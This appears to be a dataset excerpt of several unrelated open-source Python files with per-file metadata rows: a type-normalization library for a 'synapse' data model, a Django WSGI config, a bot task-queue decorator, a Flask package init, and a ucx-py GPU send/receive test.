mesg='List parting for ndef type did not consume all of the input text.')
return self._norm_list(vals, oldval)
if not s_common.isguid(text):
self._raiseBadValu(text, mesg='Expected a 32 char guid string')
return text, {}
def _norm_list(self, valu, oldval=None):
if not valu:
self._raiseBadValu(valu=valu, mesg='No valus present in list to make a guid with')
form, fvalu = valu
if not self._isTufoForm(form):
self._raiseBadValu(valu=valu, form=form,
mesg='Form is not a valid form.')
# NDefType specifically does not care about the subs since
# they aren't useful for universal node identification
fvalu, _ = self._getPropNorm(form, fvalu)
retn = s_common.guid((form, fvalu))
return retn, {}
class StrType(DataType):
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
self.regex = None
self.envals = None
self.restrip = None
self.frobintfmt = None
self.strip = info.get('strip', 0)
self.nullval = info.get('nullval')
enumstr = info.get('enums')
if enumstr is not None:
self.envals = enumstr.split(',')
regexp = info.get('regex')
if regexp is not None:
self.regex = regex.compile(regexp)
restrip = info.get('restrip')
if restrip is not None:
self.restrip = regex.compile(restrip)
frobintfmt = info.get('frob_int_fmt')
if frobintfmt is not None:
self.frobintfmt = frobintfmt
def norm(self, valu, oldval=None):
if self.frobintfmt and isinstance(valu, int):
valu = self.frobintfmt % valu
if not isinstance(valu, str):
self._raiseBadValu(valu)
if self.info.get('lower'):
valu = valu.lower()
if valu == self.nullval:
return valu, {}
if self.restrip:
valu = self.restrip.sub('', valu)
if self.strip:
valu = valu.strip()
if self.envals is not None and valu not in self.envals:
self._raiseBadValu(valu, enums=self.info.get('enums'))
if self.regex is not None and not self.regex.match(valu):
self._raiseBadValu(valu, regex=self.info.get('regex'))
return valu, {}
class JsonType(DataType):
def norm(self, valu, oldval=None):
if not isinstance(valu, str):
try:
return json.dumps(valu, sort_keys=True, separators=(',', ':')), {}
except Exception as e:
self._raiseBadValu(valu, mesg='Unable to normalize object as json.')
try:
return json.dumps(json.loads(valu), sort_keys=True, separators=(',', ':')), {}
except Exception as e:
self._raiseBadValu(valu, mesg='Unable to norm json string')
class IntType(DataType):
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
self.fmt = info.get('fmt', '%d')
# self.modval = info.get('mod',None)
self.minval = info.get('min', None)
self.maxval = info.get('max', None)
self.ismin = info.get('ismin', False)
self.ismax = info.get('ismax', False)
# cache the min or max function to avoid cond logic
# during norm() for perf
self.minmax = None
if self.ismin:
self.minmax = min
elif self.ismax:
self.minmax = max
def repr(self, valu):
return self.fmt % valu
def norm(self, valu, oldval=None):
if isinstance(valu, str):
try:
valu = int(valu, 0)
except ValueError as e:
self._raiseBadValu(valu, mesg='Unable to cast valu to int')
if not isinstance(valu, int):
self._raiseBadValu(valu, mesg='Valu is not an int')
if valu < -9223372036854775808:
self._raiseBadValu(valu, mesg='Value less than 64bit signed integer minimum (-9223372036854775808)')
if valu > 9223372036854775807:
self._raiseBadValu(valu, mesg='Value greater than 64bit signed integer maximum (9223372036854775807)')
if oldval is not None and self.minmax:
valu = self.minmax(valu, oldval)
if self.minval is not None and valu < self.minval:
self._raiseBadValu(valu, minval=self.minval)
if self.maxval is not None and valu > self.maxval:
self._raiseBadValu(valu, maxval=self.maxval)
return valu, {}
def enMsgB64(item):
# FIXME find a way to go directly from binary bytes to
# base64 *string* to avoid the extra decode pass..
return base64.b64encode(s_msgpack.en(item)).decode('utf8')
def deMsgB64(text):
# FIXME see above
return s_msgpack.un(base64.b64decode(text.encode('utf8')))
jsseps = (',', ':')
def islist(x):
return type(x) in (list, tuple)
class MultiFieldType(DataType):
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
# TODO figure out what to do about tlib vs core issues
self._getPropType = getattr(tlib, 'getPropType', None)
self.fields = None
def _norm_fields(self, valu):
fields = self._get_fields()
if len(valu) != len(fields):
self._raiseBadValu(valu, mesg='field count != %d' % (len(fields),))
vals = []
subs = {}
for valu, (name, item) in s_common.iterzip(valu, fields):
norm, fubs = item.norm(valu)
vals.append(norm)
subs[name] = norm
for fubk, fubv in fubs.items():
subs[name + ':' + fubk] = fubv
return vals, subs
def _get_fields(self):
if self.fields is None:
self.fields = []
# maintain legacy "fields=" syntax for a bit yet...
fields = self.info.get('fields')
if fields is not None:
if fields:
for part in fields.split('|'):
fname, ftype = part.split(',')
fitem = self.tlib.getTypeInst(ftype)
if self.prop:
_fitem = self._getPropType(ftype)
if _fitem:
fitem = _fitem
self.fields.append((fname, fitem))
return self.fields
# process names= and types= info fields
fnames = []
ftypes = []
fnstr = self.info.get('names')
if fnstr:
fnames.extend(fnstr.split(','))
ftstr = self.info.get('types', '')
if ftstr:
ftypes.extend(ftstr.split(','))
self.flen = len(ftypes)
if len(fnames) != self.flen:
raise s_common.BadInfoValu(name='types', valu=ftstr, mesg='len(names) != len(types)')
for i in range(self.flen):
item = self.tlib.getTypeInst(ftypes[i])
self.fields.append((fnames[i], item))
return self.fields
def _splitpairs(text, sep0, sep1):
'''
Split parts via sep0 and then pairs by sep2
'''
for part in text.split(sep0):
k, v = part.split(sep1)
yield k.strip(), v.strip()
class CompType(DataType):
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
# TODO figure out what to do about tlib vs core issues
self._getPropNorm = getattr(tlib, 'getPropNorm', None)
self.fields = []
self.optfields = []
fstr = self.info.get('fields')
if fstr:
if fstr.find('=') != -1:
self.fields.extend(_splitpairs(fstr, ',', '='))
else:
self.fields.extend(_splitpairs(fstr, '|', ','))
self.fsize = len(self.fields)
ostr = self.info.get('optfields')
if ostr:
self.optfields.extend(_splitpairs(ostr, ',', '='))
# stabilize order to alphabetical since it effects
# the eventual guid generation
self.optfields.sort()
def _norm_str(self, text, oldval=None):
text = text.strip()
if not text:
self._raiseBadValu(text, mesg='No text left after strip().')
if text[0] != '(':
return self.tlib.getTypeNorm('guid', text)
vals, off = s_syntax.parse_list(text)
if off != len(text):
self._raiseBadValu(text, off=off, vals=vals,
mesg='List parting for comp type did not consume all of the input text.')
return self._norm_list(vals)
def _norm_list(self, valu, oldval=None):
opts = {}
subs = {}
retn = []
vlen = len(valu)
if vlen < self.fsize:
self._raiseBadValu(valu, mesg='Expected %d fields and got %d' % (self.fsize, len(valu)))
for k, v in valu[self.fsize:]:
opts[k] = v
vals = valu[:self.fsize]
for v, (name, tname) in s_common.iterzip(vals, self.fields):
# FIXME - this if/else is a artifact of typelib/datamodel separation
if self.prop:
if self.tlib.isTufoProp(tname):
norm, ssubs = self._getPropNorm(tname, v)
else:
norm, ssubs = self.tlib.getTypeNorm(tname, v)
else:
norm, ssubs = self.tlib.getTypeNorm(tname, v)
subs[name] = norm
for subkey, subval in ssubs.items():
subs[name + ':' + subkey] = subval
retn.append(norm)
for name, tname in self.optfields:
v = opts.get(name)
if v is None:
continue
norm, ssubs = self.tlib.getTypeNorm(tname, v)
subs[name] = norm
for subkey, subval in ssubs.items():
subs[name + ':' + subkey] = subval
retn.append((name, norm))
return s_common.guid(retn), subs
def _norm_dict(self, valu, oldval=None):
newv = []
for name, ftype in self.fields:
fval = valu.get(name)
if fval is None:
self._raiseBadValu(valu, mesg='missing field: %s' % (name,))
newv.append(fval)
for name, ftype in self.optfields:
fval = valu.get(name)
if fval is not None:
newv.append((name, fval))
return self._norm_list(newv)
def norm(self, valu, oldval=None):
# if it's already a guid, we have nothing to normalize...
if isinstance(valu, str):
return self._norm_str(valu, oldval=oldval)
if isinstance(valu, dict):
return self._norm_dict(valu, oldval=oldval)
if not islist(valu):
self._raiseBadValu(valu, mesg='Expected guid or list/tuple')
return self._norm_list(valu)
class XrefType(DataType):
'''
The XrefType allows linking a specific type of node to an inspecific
set of node forms.
Example Sub Type:
addType('foo:barrefs', subof='xref', source='bar,foo:bar')
'''
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
self._sorc_type = None
self._sorc_name = None
sorc = info.get('source')
if sorc is not None:
parts = sorc.split(',')
if len(parts) != 2:
raise s_common.BadInfoValu(name='source', valu=sorc, mesg='expected source=<name>,<type>')
self._sorc_name = parts[0]
self._sorc_type = parts[1]
def norm(self, valu, oldval=None):
if isinstance(valu, str):
return self._norm_str(valu, oldval=oldval)
if not islist(valu):
self._raiseBadValu(valu, mesg='Expected guid, psv, or list')
return self._norm_list(valu, oldval=None)
def _norm_str(self, text, oldval=None):
text = text.strip()
if not text:
self._raiseBadValu(text, mesg='No text left after strip().')
if len(text) == 32 and text.find('=') == -1:
return self.tlib.getTypeNorm('guid', text)
vals, off = s_syntax.parse_list(text)
if off != len(text):
self._raiseBadValu(text, off=off, vals=vals,
mesg='List parting for comp type did not consume all of the input text.')
return self._norm_list(vals)
def _norm_list(self, valu, oldval=None):
if len(valu) != 2:
self._raiseBadValu(valu, mesg='xref type requires 2 fields')
valu, pvval = valu
pvval, pvsub = self.tlib.getTypeNorm('propvalu', pvval)
tstr, tval = pvval.split('=', 1)
valu, vsub = self.tlib.getTypeNorm(self._sorc_type, valu)
tval, tsub = self.tlib.getTypeNorm(tstr, tval)
iden = s_common.guid((valu, tstr, tval))
subs = {
self._sorc_name: valu,
'xref': pvval,
}
for k, v in vsub.items():
k = self._sorc_name + ':' + k
subs[k] = v
for k, v in pvsub.items():
k = 'xref:' + k
subs[k] = v
return iden, subs
class TimeType(DataType):
# FIXME subfields for various time parts (year,month,etc)
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
self.ismin = info.get('ismin', False)
self.ismax = info.get('ismax', False)
self.minmax = None
if self.ismin:
self.minmax = min
elif self.ismax:
self.minmax = max
def norm(self, valu, oldval=None):
subs = {}
# make the string into int form then apply our min/max
if isinstance(valu, str):
valu, subs = self._norm_str(valu, oldval=oldval)
if oldval is not None and self.minmax:
valu = self.minmax(valu, oldval)
return valu, subs
def _norm_str(self, text, oldval=None):
if text.strip().lower() == 'now':
return s_common.now(), {}
return s_time.parse(text), {}
def repr(self, valu):
return s_time.repr(valu)
class SeprType(MultiFieldType):
def __init__(self, tlib, name, **info):
MultiFieldType.__init__(self, tlib, name, **info)
self.sepr = info.get('sep', ',')
self.reverse = info.get('reverse', 0)
def norm(self, valu, oldval=None):
subs = {}
reprs = []
if isinstance(valu, str):
valu = self._split_str(valu)
# only other possiblity should be that it was a list
for part, (name, tobj) in self._zipvals(valu):
if tobj == self:
norm, nsub = part, {}
reprs.append(norm)
else:
norm, nsub = tobj.norm(part)
reprs.append(tobj.repr(norm))
subs[name] = norm
for subn, subv in nsub.items():
subs['%s:%s' % (name, subn)] = subv
return self.sepr.join(reprs), subs
def _split_str(self, text):
fields = self._get_fields()
if self.reverse:
parts = text.rsplit(self.sepr, len(fields) - 1)
else:
parts = text.split(self.sepr, len(fields) - 1)
if len(parts) != len(fields):
self._raiseBadValu(text, sep=self.sepr, mesg='split: %d fields: %d' % (len(parts), len(fields)))
return parts
def _zipvals(self, vals):
return s_common.iterzip(vals, self._get_fields())
class BoolType(DataType):
def norm(self, valu, oldval=None):
if isinstance(valu, str):
valu = valu.lower()
if valu in ('true', 't', 'y', 'yes', '1', 'on'):
return 1, {}
if valu in ('false', 'f', 'n', 'no', '0', 'off'):
return 0, {}
self._raiseBadValu(valu, mesg='Invalid boolean string')
return int(bool(valu)), {}
def repr(self, valu):
return repr(bool(valu))
tagre = regex.compile(r'^([\w]+\.)*[\w]+$')
class TagType(DataType):
def norm(self, valu, oldval=None):
parts = valu.split('@', 1)
subs = {}
if len(parts) == 2:
strs = parts[1].split('-')
tims = [self.tlib.getTypeNorm('time', s)[0] for s in strs]
tmin = min(tims)
tmax = max(tims)
subs['seen:min'] = tmin
subs['seen:max'] = tmax
retn = parts[0].lower()
if not tagre.match(retn):
self._raiseBadValu(valu)
return retn, subs
class StormType(DataType):
def norm(self, valu, oldval=None):
try:
s_syntax.parse(valu)
except Exception as e:
self._raiseBadValu(valu)
return valu, {}
class PermType(DataType):
'''
Enforce that the permission string and options are known.
'''
def norm(self, valu, oldval=None):
try:
pnfo, off = s_syntax.parse_perm(valu)
except Exception as e:
self._raiseBadValu(valu)
if off != len(valu):
self._raiseBadValu(valu)
return valu, {}
class PropValuType(DataType):
def __init__(self, tlib, name, **info):
DataType.__init__(self, tlib, name, **info)
# TODO figure out what to do about tlib vs core issues
self._reqPropNorm = getattr(tlib, 'reqPropNorm', None)
self._getPropRepr = getattr(tlib, 'getPropRepr', None)
def norm(self, valu, oldval=None):
# if it's already a str, we'll need to split it into its two parts to norm.
if isinstance(valu, str):
return self._norm_str(valu, oldval=oldval)
if not islist(valu):
self._raiseBadValu(valu, mesg='Expected str or list/tuple.')
return self._norm_list(valu)
def _norm_str(self, text, oldval=None):
text = text.strip()
if not text:
self._raiseBadValu(text, mesg='No text left after strip().')
if '=' not in text:
self._raiseBadValu(text, mesg='PropValu is missing a =')
valu = text.split('=', 1)
return self._norm_list(valu)
def _norm_list(self, valu, oldval=None):
if len(valu) != 2:
self._raiseBadValu(valu=valu, mesg='PropValu requires two values to norm.')
prop, valu = valu
try:
nvalu, nsubs = self._reqPropNorm(prop, valu, oldval=oldval)
except (s_common.BadTypeValu, s_common.NoSuchProp) as e:
logger.exception('Failed to norm PropValu.')
self._raiseBadValu(valu, mesg='Unable to norm PropValu', prop=prop)
subs = {'prop': prop}
if isinstance(nvalu, str):
subs['strval'] = nvalu
else:
subs['intval'] = nvalu
nrepr = self._getPropRepr(prop, nvalu)
retv = '='.join([prop, nrepr])
return retv, subs
class TypeLib:
'''
An extensible type library for use in cortex data models.
'''
def __init__(self, load=True):
self.types = {}
self.casts = {}
self.typeinfo = {}
self.typetree = {}
self.subscache = {}
self.modlnames = set()
# pend creation of subtypes for non-existant base types
# until the base type gets loaded.
self.pended = collections.defaultdict(list)
self.addType('str', ctor='synapse.lib.types.StrType', doc='The base string type')
self.addType('int', ctor='synapse.lib.types.IntType', doc='The base integer type')
self.addType('bool', ctor='synapse.lib.types.BoolType', doc='A boolean type')
self.addType('json', ctor='synapse.lib.types.JsonType', doc='A json type (stored as str)')
self.addType('guid', ctor='synapse.lib.types.GuidType', doc='A Globally Unique Identifier type')
self.addType('sepr', ctor='synapse.lib.types.SeprType',
doc='A multi-field composite type which uses separated repr values')
self.addType('comp', ctor='synapse.lib.types.CompType',
doc='A multi-field composite type which generates a stable guid from normalized fields')
self.addType('xref', ctor='synapse.lib.types.XrefType',
doc='A multi-field composite type which can be used to link a known form to an unknown form')
self.addType('time', ctor='synapse.lib.types.TimeType',
doc='Timestamp in milliseconds since epoch', ex='20161216084632')
self.addType('ndef', ctor='synapse.lib.types.NDefType',
doc='The type used for normalizing node:ndef values.')
self.addType('syn:tag', ctor='synapse.lib.types.TagType', doc='A synapse tag', ex='foo.bar')
self.addType('syn:perm', ctor='synapse.lib.types.PermType', doc='A synapse permission string')
self.addType('syn:storm', ctor='synapse.lib.types.StormType', doc='A synapse storm query string')
self.addType('propvalu', ctor='synapse.lib.types.PropValuType', ex='foo:bar=1234',
doc='An equal sign delimited property/valu combination.',)
# add base synapse types
self.addType('syn:core', subof='str')
self.addType('syn:prop', subof='str', regex=r'^([\w]+:)*([\w]+|\*)$', lower=1)
self.addType('syn:type', subof='str', regex=r'^([\w]+:)*[\w]+$', lower=1)
self.addType('syn:glob', subof='str', regex=r'^([\w]+:)*[\w]+:\*$', lower=1)
self.addType('int:min', subof='int', ismin=1)
self.addType('int:max', subof='int', ismax=1)
self.addType('str:lwr', subof='str', lower=1, strip=1)
self.addType('str:txt', subof='str', doc='Multi-line text or text blob.')
self.addType('str:hex', subof='str', frob_int_fmt='%x', regex=r'^[0-9a-f]+$', lower=1)
self.addTypeCast('country:2:cc', self._castCountry2CC)
self.addTypeCast('int:2:str10', self._castMakeInt10)
self.addTypeCast('make:guid', self._castMakeGuid)
self.addTypeCast('make:json', self._castMakeJson)
if load:
self.loadModModels()
def _castCountry2CC(self, valu):
valu = valu.replace('.', '').lower()
return s_l_iso3166.country2iso.get(valu)
def _castMakeGuid(self, valu):
return s_common.guid(valu)
def _castMakeJson(self, valu):
valu = json.dumps(valu, sort_keys=True, separators=(',', ':'))
return valu
def _castMakeInt10(self, valu):
if isinstance(valu, int):
valu = str(valu)
return valu
return valu
def getTypeInst(self, name):
'''
Return the DataType instance for the given type name.
Example:
dtype = tlib.getTypeInst('foo:bar')
NOTE: This API returns non-primitive objects and can not be
used over telepath RMI.
'''
return self.types.get(name)
def getTypeBases(self, name):
'''
Return a list of type inheritence names beginning with the base type.
Example:
for base in tlib.getTypeBases('foo:minval'):
print('base type: %s' % (name,))
'''
done = [name]
todo = self.typetree.get(name)
while todo is not None:
done.append(todo)
todo = self.typetree.get(todo)
done.reverse()
return done
def isSubType(self, name, base):
'''
Returns True if the given type name is a sub-type of the base name.
Example:
if tlib.isSubType('foo','str'):
dostuff()
'''
key = (name, base)
ret = self.subscache.get(key)
if ret is None:
ret = base in self.getTypeBases(name)
self.subscache[key] = ret
return ret
def addDataModels(self, modtups):
'''
Load a list of (name,model) tuples.
Args:
modtups ([(str,dict)]): A list of (name,modl) tuples.
Returns:
(None)
NOTE: This API loads all types first and may therefor be used to
prevent type dependency ordering issues between multiple models.
'''
return self._addDataModels(modtups)
def addDataModel(self, name, modl):
return self.addDataModels([(name, modl)])
def isDataModl(self, name):
'''
Return True if the given data model name exists.
Args:
name (str): The name of the data model
Returns:
(boolean): True if the model exists
'''
return name in self.modlnames
def _addDataModels(self, modtups):
for modname, moddict in modtups:
self.modlnames.add(modname)
# add all base types first to simplify deps
for name, info in moddict.get('types', ()):
try:
self.addType(name, **info)
except Exception as e:
logger.exception('type %s: %s' % (name, e))
def loadModModels(self):
dynmodls = s_modules.call_ctor('getBaseModels')
models = []
for name, modls, excp in dynmodls:
if not modls:
logger.warning('dyn model empty: %r %r' % (name, excp))
continue
models.extend(modls)
self.addDataModels(models)
def _bumpBasePend(self, name):
for name, info in self.pended.pop(name, ()):
try:
self.addType(name, **info)
except Exception as e:
logger.exception('pended: addType %s' % name)
def getDataType(self, name):
'''
Return the DataType subclass for the given type name.
'''
return self.types.get(name)
def isDataType(self, name):
'''
Return boolean which is true if the given name is a data type.
Example:
if tlib.isDataType('foo:bar'):
dostuff()
'''
return self.types.get(name) is not None
def reqDataType(self, name):
'''
Return a reference to the named DataType or raise NoSuchType.
Args:
name (str): Name of the type to get a reference for.
Returns:
DataType: Instance of a DataType for that name.
Raises:
NoSuchType: If the type is not valid.
'''
item = self.getDataType(name)
if item is None:
raise s_common.NoSuchType(name=name)
return item
def addType(self, name, **info):
'''
Add a type to the cached types.
Args:
name (str): Name of the type to add.
**info (dict): Type properties to include.
Example:
Add a new foo:bar type::
tlib.addType('foo:bar', subof='str', doc='A foo bar.')
Raises:
DupTypeName: If the type already exists.
'''
if self.types.get(name) is not None:
raise s_common.DupTypeName(name=name)
ctor = info.get('ctor')
subof = info.get('subof')
if ctor is None and subof is None:
raise Exception('addType must have either ctor= or subof=')
if ctor is not None:
self.typeinfo[name] = info
try:
item = s_dyndeps.tryDynFunc(ctor, self, name, **info)
self.types[name] = item
self._bumpBasePend(name)
return True
except Exception as e:
logger.warning('failed to ctor type %s', name, exc_info=True)
logger.debug('failed to ctor type %s', name, exc_info=True)
self.typeinfo.pop(name, None)
try:
base = self.reqDataType(subof)
# inherit docs and examples from parent types
self.typeinfo[name] = info
item = base.extend(name, **info)
self.types[name] = item
self._bumpBasePend(name)
self.typetree[name] = subof
self.subscache.clear()
return True
except s_common.NoSuchType as e:
tnam = e.errinfo.get('name')
self.typeinfo.pop(name, None)
self.pended[tnam].append((name, info))
return False
def getTypeDefs(self):
'''
Return a list of (name,info) tuples for all the types.
Returns:
([(name,info)]): The loaded types
'''
return list(self.typeinfo.items())
def getTypeDef(self, name):
'''
Get the definition for a given type.
Args:
name (str): Name of the type to look up.
Examples:
Do stuff with the type definition of 'int'::
tdef = tlib.getTypeDef('int')
dostuff(tdef)
Returns:
((str, dict)): The type definition tufo. The str is the name of the type, and the dictionary are any type
options (ctor and subof values). If the name is not a registered type, this is None.
'''
info = self.typeinfo.get(name)
if info is None:
return None
return (name, info)
def getTypeInfo(self, name, prop, defval=None):
'''
A helper to return an info prop for the type or it's parents.
Example:
ex = tlib.getTypeInfo('inet:tcp4','ex')
'''
todo = name
while todo is not None:
info = self.typeinfo.get(todo)
if info is None:
return defval
ret = info.get(prop)
if ret is not None:
return ret
todo = info.get('subof')
return defval
def getTypeNorm(self, name, valu, oldval=None):
'''
Normalize a type specific value in system mode.
Example:
fqdn,subs = tlib.getTypeNorm('inet:fqdn','Foo.Com')
'''
return self.reqDataType(name).norm(valu, oldval=oldval)
def getTypeCast(self, name, valu):
'''
Use either a type or a registered "cast" name to normalize
the given input.
Example:
valu = tlib.getTypeCast("foo:bar","hehe")
'''
func = self.casts.get(name)
if func is not None:
return func(valu)
return self.getTypeNorm(name, valu)[0]
def addTypeCast(self, name, func):
'''
Add a "cast" function to do normalization without
creating a complete type.
'''
self.casts[name] = func
def getTypeRepr(self, name, valu):
'''
Return the humon readable form of the given type value.
Example:
print( tlib.getTypeRepr('inet:ipv4', ipv4addr) )
'''
return self.reqDataType(name).repr(valu)
def getTypeParse(self, name, text):
'''
Parse input text for the given type into it's system form.
Example:
ipv4,subs = tlib.getTypeParse('inet:ipv4','1.2.3.4')
'''
return self.reqDataType(name).parse(text)
| 29.999201 | 117 | 0.557097 |
7e354fdcd835e13d146b7880183792a39679b934 | 395 | py | Python | topsecret/wsgi.py | TanCodes/TopSecrete | 6727bf19caceda73393c9899bc0fe51b2750beff | [
"MIT"
] | null | null | null | topsecret/wsgi.py | TanCodes/TopSecrete | 6727bf19caceda73393c9899bc0fe51b2750beff | [
"MIT"
] | null | null | null | topsecret/wsgi.py | TanCodes/TopSecrete | 6727bf19caceda73393c9899bc0fe51b2750beff | [
"MIT"
] | null | null | null | """
WSGI config for topsecret project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'topsecret.settings')
application = get_wsgi_application()
| 23.235294 | 78 | 0.787342 |
f2163ea564896481fd07cc51e04bfd48bf63d724 | 1,060 | py | Python | botoy/decorators/_queued_up.py | First-frost/botoy | 20a6f32c61beb045a9dbea11f0b1744fc6a40a60 | [
"MIT"
] | 1 | 2021-06-17T10:20:45.000Z | 2021-06-17T10:20:45.000Z | botoy/decorators/_queued_up.py | First-frost/botoy | 20a6f32c61beb045a9dbea11f0b1744fc6a40a60 | [
"MIT"
] | null | null | null | botoy/decorators/_queued_up.py | First-frost/botoy | 20a6f32c61beb045a9dbea11f0b1744fc6a40a60 | [
"MIT"
] | null | null | null | import functools
import time
from collections import defaultdict
from queue import Queue
from threading import Thread
from botoy.log import logger
class TaskThread(Thread):
def __init__(self):
super().__init__()
self.tasks = Queue(maxsize=-1)
self.setDaemon(True)
self.start()
def run(self):
while True:
try:
self.tasks.get()()
except Exception as e:
logger.warning(f"queued_up装饰器: 队列任务出错{e}")
finally:
self.tasks.task_done()
time.sleep(1)
def put_task(self, target, *args):
task = functools.partial(target, *args)
self.tasks.put(task)
taskThread_dict = defaultdict(TaskThread)
def queued_up(func=None, *, name="default"):
"""队列执行函数
:param name: 指定队列分组, 不同的名称用不同的队列
"""
if func is None:
return functools.partial(queued_up, name=name)
def inner(ctx):
task_thread = taskThread_dict[repr(name)]
task_thread.put_task(func, ctx)
return inner
| 22.553191 | 58 | 0.609434 |
5a6e0bc0308d72f6efdcbbe1a232a38d09ae16a0 | 69 | py | Python | {{cookiecutter.project_name}}/{{cookiecutter.app_name}}/api/resources/__init__.py | DevAerial/flask-api-template | 6d3f745f2dacb793c4bdc6aaaceb86eb472efe55 | [
"MIT"
] | null | null | null | {{cookiecutter.project_name}}/{{cookiecutter.app_name}}/api/resources/__init__.py | DevAerial/flask-api-template | 6d3f745f2dacb793c4bdc6aaaceb86eb472efe55 | [
"MIT"
] | null | null | null | {{cookiecutter.project_name}}/{{cookiecutter.app_name}}/api/resources/__init__.py | DevAerial/flask-api-template | 6d3f745f2dacb793c4bdc6aaaceb86eb472efe55 | [
"MIT"
] | null | null | null | from .ping import ping_namespace
__all__ = [
'ping_namespace',
] | 13.8 | 32 | 0.710145 |
6136dd4840378b5de37875e850dfaa1054730bf9 | 6,343 | py | Python | tests/test_send_recv_two_workers.py | pentschev/ucx-py | d701a3facd85ef2deece619a4f707fdebee36e3c | [
"BSD-3-Clause"
] | 76 | 2019-06-08T04:03:39.000Z | 2022-01-07T20:34:23.000Z | tests/test_send_recv_two_workers.py | rapidsai/ucx-py | e28d770aa0b47c0e63c2e7e61649f1b355560e8a | [
"BSD-3-Clause"
] | 644 | 2019-06-04T23:06:02.000Z | 2022-02-24T11:17:45.000Z | tests/test_send_recv_two_workers.py | pentschev/ucx-py | d701a3facd85ef2deece619a4f707fdebee36e3c | [
"BSD-3-Clause"
] | 32 | 2019-08-14T09:22:02.000Z | 2022-01-21T20:17:50.000Z | import asyncio
import multiprocessing
import os
import random
import numpy as np
import pytest
from utils import am_recv, am_send, get_cuda_devices, get_num_gpus, recv, send
import ucp
cupy = pytest.importorskip("cupy")
rmm = pytest.importorskip("rmm")
distributed = pytest.importorskip("distributed")
cloudpickle = pytest.importorskip("cloudpickle")
ITERATIONS = 30
async def get_ep(name, port):
addr = ucp.get_address()
ep = await ucp.create_endpoint(addr, port)
return ep
def register_am_allocators():
ucp.register_am_allocator(lambda n: np.empty(n, dtype=np.uint8), "host")
ucp.register_am_allocator(lambda n: rmm.DeviceBuffer(size=n), "cuda")
def client(port, func, comm_api):
# wait for server to come up
# receive cudf object
# deserialize
# assert deserialized msg is cdf
# send receipt
from distributed.utils import nbytes
ucp.init()
if comm_api == "am":
register_am_allocators()
# must create context before importing
# cudf/cupy/etc
async def read():
await asyncio.sleep(1)
ep = await get_ep("client", port)
msg = None
import cupy
cupy.cuda.set_allocator(None)
for i in range(ITERATIONS):
if comm_api == "tag":
frames, msg = await recv(ep)
else:
frames, msg = await am_recv(ep)
close_msg = b"shutdown listener"
if comm_api == "tag":
close_msg_size = np.array([len(close_msg)], dtype=np.uint64)
await ep.send(close_msg_size)
await ep.send(close_msg)
else:
await ep.am_send(close_msg)
print("Shutting Down Client...")
return msg["data"]
rx_cuda_obj = asyncio.get_event_loop().run_until_complete(read())
rx_cuda_obj + rx_cuda_obj
num_bytes = nbytes(rx_cuda_obj)
print(f"TOTAL DATA RECEIVED: {num_bytes}")
cuda_obj_generator = cloudpickle.loads(func)
pure_cuda_obj = cuda_obj_generator()
if isinstance(rx_cuda_obj, cupy.ndarray):
cupy.testing.assert_allclose(rx_cuda_obj, pure_cuda_obj)
else:
from cudf.testing._utils import assert_eq
assert_eq(rx_cuda_obj, pure_cuda_obj)
def server(port, func, comm_api):
# create listener receiver
# write cudf object
# confirm message is sent correctly
from distributed.comm.utils import to_frames
from distributed.protocol import to_serialize
ucp.init()
if comm_api == "am":
register_am_allocators()
async def f(listener_port):
# coroutine shows up when the client asks
# to connect
async def write(ep):
import cupy
cupy.cuda.set_allocator(None)
print("CREATING CUDA OBJECT IN SERVER...")
cuda_obj_generator = cloudpickle.loads(func)
cuda_obj = cuda_obj_generator()
msg = {"data": to_serialize(cuda_obj)}
frames = await to_frames(msg, serializers=("cuda", "dask", "pickle"))
for i in range(ITERATIONS):
# Send meta data
if comm_api == "tag":
await send(ep, frames)
else:
await am_send(ep, frames)
print("CONFIRM RECEIPT")
close_msg = b"shutdown listener"
if comm_api == "tag":
msg_size = np.empty(1, dtype=np.uint64)
await ep.recv(msg_size)
msg = np.empty(msg_size[0], dtype=np.uint8)
await ep.recv(msg)
else:
msg = await ep.am_recv()
recv_msg = msg.tobytes()
assert recv_msg == close_msg
print("Shutting Down Server...")
await ep.close()
lf.close()
lf = ucp.create_listener(write, port=listener_port)
try:
while not lf.closed():
await asyncio.sleep(0.1)
except ucp.UCXCloseError:
pass
loop = asyncio.get_event_loop()
loop.run_until_complete(f(port))
def dataframe():
import numpy as np
import cudf
# always generate the same random numbers
np.random.seed(0)
size = 2 ** 26
return cudf.DataFrame(
{"a": np.random.random(size), "b": np.random.random(size)},
index=np.random.randint(size, size=size),
)
def series():
import cudf
return cudf.Series(np.arange(90000))
def empty_dataframe():
import cudf
return cudf.DataFrame({"a": [1.0], "b": [1.0]}).head(0)
def cupy_obj():
import cupy
size = 10 ** 8
return cupy.arange(size)
@pytest.mark.slow
@pytest.mark.skipif(
get_num_gpus() <= 2, reason="Machine does not have more than two GPUs"
)
@pytest.mark.parametrize(
"cuda_obj_generator", [dataframe, empty_dataframe, series, cupy_obj]
)
@pytest.mark.parametrize("comm_api", ["tag", "am"])
def test_send_recv_cu(cuda_obj_generator, comm_api):
if comm_api == "am" and not ucp._libs.ucx_api.is_am_supported():
pytest.skip("AM only supported in UCX >= 1.11")
base_env = os.environ
env_client = base_env.copy()
# grab first two devices
cvd = get_cuda_devices()[:2]
cvd = ",".join(map(str, cvd))
# reverse CVD for other worker
env_client["CUDA_VISIBLE_DEVICES"] = cvd[::-1]
port = random.randint(13000, 15500)
# serialize function and send to the client and server
# server will use the return value of the contents,
# serialize the values, then send serialized values to client.
# client will compare return values of the deserialized
# data sent from the server
func = cloudpickle.dumps(cuda_obj_generator)
ctx = multiprocessing.get_context("spawn")
server_process = ctx.Process(
name="server", target=server, args=[port, func, comm_api]
)
client_process = ctx.Process(
name="client", target=client, args=[port, func, comm_api]
)
server_process.start()
# cudf will ping the driver for validity of device
# this will influence device on which a cuda context is created.
# work around is to update env with new CVD before spawning
os.environ.update(env_client)
client_process.start()
server_process.join()
client_process.join()
assert server_process.exitcode == 0
assert client_process.exitcode == 0
| 27.458874 | 81 | 0.630301 |
